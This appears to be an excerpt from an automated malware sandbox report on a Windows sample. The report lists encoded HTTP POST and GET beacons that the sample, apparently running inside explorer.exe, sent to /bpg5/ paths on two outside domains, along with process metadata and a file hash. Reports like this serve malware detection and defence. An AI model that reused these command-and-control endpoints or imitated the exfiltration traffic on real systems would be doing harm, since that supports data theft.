                                                  Data Ascii: lpw7=DyoAyxbHWFxxAZN1SPpv8nWKVHuApKktDEW-YU4_JahfMhxHzC0FOYNeojdTkcUfR1Nwv_IwaYs2oQT-Kk2bccJ0KSgsvjEtwo5nMMzdoAmQTMH67fWUxAPYS_QnpYGe8THGtcXETaAbzY3-jbWFFjldhF6B3kEqxENQNgRv5jFyBM3mpLKaiPRAi2m-1cd9vtxrowVguBaLZYRlMxdE7t45BWC_8WD1zh8Tj4~9GdIyAmjO5AhgtiB9YUWqUABK4p5K0fU7sFAx1dyFERRTRxgolmL-ogz9qwgzJfGbOQZRWi1ai0DfEjyjTRaxRCsZqcJr(b9LeYdwsgJO0wMLyxM5yuC4YosXuPCHzQK0kOOCOzOtbATnAQVGYpEfYousL5kkQA5U9ggku0SBSojhUglsfinr4VlcjDU40YFG0i7qS9eA3qQzv1XuWcogeMbK3ievx87V3vAHZMgWXVlVGq2kxV(wI9U6QvjYHo749sYIOY6wYZVdvycOqAoxcOrU0lEe4rnBXyRdBhwyZtlOpyP_~oACAta-yHMRz6iUySIXADRDDxE5tEE_tAwQrAGNYRbLUZ19~_ljNGt0VsUWjhg1IZOwRTs1CbOIPyd4OK9RU7yNsJoCRChH4u(Hyz6J9VC0Wp3vYCb9K1HSNyMFJfwDrgJiYW8Fdw0xk7Z5nHlsXZypYxgX(paxRLmWo0aYob40c3~1xh9unZN76NfjKYuDnIgc0y~S5IizkQz25LD88gDqc4HH2bZc7tSyHh(vWJJDqT0DFmRk3mI2L2JbwLJ40mcPrWhHuGgp1GxIhlqeQVlnP-067PZcMf3bz1KAVhbrcaWn6m76P168oCHYrdCuwERSfoIL7veoK9Z0cX7Qrou0zrNFtedd4WuFACIOcahoUH(gL4m24rZz9grBehxW3nCm5tJytZ3axz02j3aesfG28B2SnUw9Rf9Vrf7ry3efbIaigsW9yFWIfq6hkZxcA06xiRvp6R5zhNi6xFfHE17anJglm6jBiKQK(Me_4c~xNziYkBthE2(1hE~0Mkh5m0TVM2N_axG5iZTJFeYgfw53ITOCVysX8jx8YVx6C12UNQ73KX1weevripjdzh6AJwFDdfntqOXV7f0V1FTOuWqT6q~HWuyPHMpwZibGPOHD0J0NOB3qZYBayXNxo5~aQ32U1_2n~FIN(ax3e7o409ibj_tnod~cAsrJDapYSAIhVPiD(zOY7VpXDrld3nzxeBrayQ3rsY76lsf1uvLW~uu0(1mvSSGGG0cTuW7dvf33or6xtnMJXKHunfi4F8E4DVD5~xxeixdfv8loVpRPdU1z0CZqLEoi5CjOzq7pkt(c~EzGO6Kq7oy7NtAcaHeCYFOhq1NNVyzLU9RdJLBr9JU7zXtIiXgSQfXuNdDGP9uT2QC-aCHP5fMFInTOeQbZrVvxBARxp_BZXddmQXm-UImR2ZwRGWNgFeIeS8qjrg).
                                                  May 25, 2023 11:36:29.683489084 CEST45INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:29 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.449702198.177.124.5780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:32.520883083 CEST46OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.gomarketing.info
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.gomarketing.info
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.gomarketing.info/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 6e 57 59 35 4a 41 5a 47 38 56 6c 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhnWY5JAZG8VltLOu4pA).
                                                  May 25, 2023 11:36:32.777395964 CEST46INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:32 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.449703198.177.124.5780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:35.398175955 CEST47OUTGET /bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.gomarketing.info
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:36:35.667893887 CEST48INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:35 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.449704188.114.96.780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:41.578329086 CEST50OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.antalyabfe.com
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.antalyabfe.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.antalyabfe.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 4d 38 6a 37 58 39 74 79 70 38 57 46 33 62 71 68 63 76 4c 4f 6d 69 6d 4a 42 61 64 31 43 58 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 70 61 71 72 63 70 65 63 30 49 44 52 74 5a 54 71 73 59 46 44 35 54 7a 48 56 32 44 4e 69 69 42 6a 36 30 66 54 77 5a 50 74 56 71 72 5a 6a 30 56 54 54 53 43 70 4d 2d 49 47 76 6b 37 36 50 38 41 68 47 4f 6d 31 7e 4f 6f 70 65 39 7e 65 73 76 7e 67 71 32 58 69 76 67 66 32 79 56 71 6d 6f 49 56 79 7a 50 73 77 35 47 6f 31 6f 74 54 31 31 6e 34 6d 69 7a 4a 39 6e 61 6a 71 77 78 77 4d 58 45 39 38 49 36 7e 36 41 5a 4b 52 56 64 43 55 47 32 6d 4f 6e 6c 57 74 64 2d 32 42 7a 76 62 72 45 67 4d 6f 56 37 6f 6b 42 6e 73 35 46 50 33 37 53 4b 6c 76 68 57 47 6c 64 54 73 56 67 48 68 58 72 63 6f 73 5a 6d 30 48 78 39 46 34 66 6e 52 2d 78 2d 59 37 64 64 47 70 4e 45 28 78 74 4c 67 4a 38 2d 4a 79 33 46 53 5f 70 7a 71 35 61 38 43 54 54 79 63 42 37 35 47 62 33 32 4f 73 75 62 70 32 28 78 71 7a 47 77 33 6e 64 7a 4b 62 64 58 48 31 79 43 57 30 79 58 5a 52 6e 51 44 53 6a 5a 78 6d 36 71 76 35 61 47 6d 44 31 78 4a 46 38 6a 4f 72 74 6e 48 64 54 50 54 58 75 72 45 64 41 4b 5a 59 6f 67 75 4a 37 70 54 6c 46 47 56 30 63 49 4a 6f 6a 4a 61 33 7e 4a 49 65 7a 4f 67 66 48 71 52 71 53 4c 76 66 6e 4d 56 39 6c 4d 47 4c 61 70 49 4f 35 4d 54 56 43 30 57 5a 4a 54 55 6a 38 4a 46 33 71 49 71 47 71 4f 69 46 31 34 62 44 64 72 33 4b 67 42 58 59 48 6d 7a 53 43 35 4f 7a 4c 4c 31 70 38 35 67 74 4e 34 65 61 45 32 4a 51 68 4e 7a 48 39 61 4d 62 72 4a 4e 51 6f 50 41 58 68 57 73 46 76 35 6e 52 70 54 77 35 32 39 37 48 53 48 79 73 47 44 62 53 31 6e 59 69 33 49 49 4c 67 6a 68 34 54 48 35 36 4c 5a 6c 77 71 4d 7a 51 6c 59 62 4a 4d 65 45 6e 69 72 46 56 6d 70
                                                  Data Ascii: lpw7=8GpXORSvCn1_kVxeyulVKPVMdPPb~jzZDpKwRlaKvCW7inELP_H-jrZV8zvsW_JwsueJz4oNOI(Jt0R-KJEzGAMTWdWHSsTy4pnMcDS5ZoIieUz6NoIV1nK8X1yAefcrP5gL~4BoALJkBkJAzL2gPIqzvTKMsrH3Aiiy7Cnf3VRm8Wzi(3moJ7AJXdpmNA~z815IS0gXRMTUY3K7QU9pFDMo8zfR0zaChmLU6s1Kj5b7FTdiiJGKmYuhn7sv18hdx8mwz39IwIRe5i8XgbIBTun-M8j7X9typ8WF3bqhcvLOmimJBad1CXyjyIxD9DEM(-dgX-M7SfiTgPNmkPCVK7BqJZ7vv1mBduQ5YYt9jqiqDTScdHsWOXexB47Oee3RaKvYUQbZLK7Fg8DM9zUsm2KvYQLLwiulb7hVAKbYtJU4hiHzHQeBNJFfjHtMwYtEylobeJqIoqfuODCMz8SPt461GylYzyfgVVgtJsFP3lg7FTBSqrc7MQE7fwUzd1DrkojJTFe3MP4k~8QYM829svqYJ7ZtKfwkk1qkBHNqL9hBPlypyZl19_YbndHapQOY38rw1u(pyIff1dbkjJoHiyc2s5Iq3Va7NHjuu1YxasI6NPQSRbIHve0ymtslKb(Rm30m7EOb6N3CQQDDdy5cA5xUp1mfKmp4(lzaXMwXwz4EWUVAsUcDx3AGEN9DB_L02Kzt6HDbNWZbL22QTwH8~96pxbraF8zvpZ0A7GeaEvaNXYISLwXCVEKHHdd91fyqQceQrmx5QBwulTMpDoWR8bzZ5st4EYq8afhWZTUsDhcd30av5fXpigvXmS9DMMcF2VM-aTMc6gzmnimIQ4fLVeqypaqrcpec0IDRtZTqsYFD5TzHV2DNiiBj60fTwZPtVqrZj0VTTSCpM-IGvk76P8AhGOm1~Oope9~esv~gq2Xivgf2yVqmoIVyzPsw5Go1otT11n4mizJ9najqwxwMXE98I6~6AZKRVdCUG2mOnlWtd-2BzvbrEgMoV7okBns5FP37SKlvhWGldTsVgHhXrcosZm0Hx9F4fnR-x-Y7ddGpNE(xtLgJ8-Jy3FS_pzq5a8CTTycB75Gb32Osubp2(xqzGw3ndzKbdXH1yCW0yXZRnQDSjZxm6qv5aGmD1xJF8jOrtnHdTPTXurEdAKZYoguJ7pTlFGV0cIJojJa3~JIezOgfHqRqSLvfnMV9lMGLapIO5MTVC0WZJTUj8JF3qIqGqOiF14bDdr3KgBXYHmzSC5OzLL1p85gtN4eaE2JQhNzH9aMbrJNQoPAXhWsFv5nRpTw5297HSHysGDbS1nYi3IILgjh4TH56LZlwqMzQlYbJMeEnirFVmpaJAq4erLl9eLD2Yy4_D4cQMeewFS2Wwjz2IXB8ZLm7aNe3OCfPXdU5XAyW0G1hoi(4IVH86oW33CoX3aT-v8~0rNr0Py5FOrfwVVdDmENxsDNmIcSfnQ).
                                                  May 25, 2023 11:36:41.604068041 CEST51INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 25 May 2023 09:36:41 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=3600
                                                  Expires: Thu, 25 May 2023 10:36:41 GMT
                                                  Location: https://www.antalyabfe.com/bpg5/
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fvMMC2%2BBzv%2BDFiQpeM1e%2B%2FZu7eRncEXDG5ho%2FlzACSUAbpl%2BHm%2F2DM%2F0GK362SZMOiqqRTvKNxiFCDWYWCxDgIVz0R7bEma0YEa3hHK%2Fgd66bphAV7r13RyXQ7Z5LQOZ0pJFHTI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Vary: Accept-Encoding
                                                  Server: cloudflare
                                                  CF-RAY: 7ccccba3d8141cc5-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.449705188.114.96.780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:44.122037888 CEST52OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.antalyabfe.com
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.antalyabfe.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.antalyabfe.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 45 42 62 44 79 6a 37 41 70 78 45 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7EBbDyj7ApxEHqliqlw).
                                                  May 25, 2023 11:36:44.149734974 CEST53INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 25 May 2023 09:36:44 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=3600
                                                  Expires: Thu, 25 May 2023 10:36:44 GMT
                                                  Location: https://www.antalyabfe.com/bpg5/
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qcXqpqk4fK%2BBqeMi8IGrh6N7GRjrg1HhWgroGx4WuarfIqhxy%2BUajPDM6XwBFFnR%2FaUFl%2F0i%2Fg9u3LVyH5mh38Y9mVupx%2BryC4D2jngYL2xRiKG0C6OScFnxVgwXulg52uD8gF8%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Vary: Accept-Encoding
                                                  Server: cloudflare
                                                  CF-RAY: 7ccccbb3c924bbd9-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  9192.168.2.449706188.114.96.780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:46.669306993 CEST54OUTGET /bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.antalyabfe.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:36:46.695374966 CEST54INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 25 May 2023 09:36:46 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=3600
                                                  Expires: Thu, 25 May 2023 10:36:46 GMT
                                                  Location: https://www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&UZCu=zJfEuRXw-P
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UeRQWwGF3D1p3rN7%2FRFGW8rF05onyyzzmEDObuXtAFOd0bNxdtB%2FbjQEaOV2PVFAQy5laVTC5MCIrum9771wsLMK%2FRYlRQ22NrE%2B%2FtjnFxg7pca8Kk0VplwN28t4ZvVrgR%2F6AGM%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 7ccccbc3a930929c-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:1
                                                  Start time:11:35:39
                                                  Start date:25/05/2023
                                                  Path:C:\Users\user\Desktop\P5348574_74676.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\P5348574_74676.exe
                                                  Imagebase:0x640000
                                                  File size:718848 bytes
                                                  MD5 hash:A18C297A0E296E70FF0B3F159EC31B2D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:low

                                                  General

                                                  Target ID:2
                                                  Start time:11:35:41
                                                  Start date:25/05/2023
                                                  Path:C:\Users\user\Desktop\P5348574_74676.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\P5348574_74676.exe
                                                  Imagebase:0xd50000
                                                  File size:718848 bytes
                                                  MD5 hash:A18C297A0E296E70FF0B3F159EC31B2D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
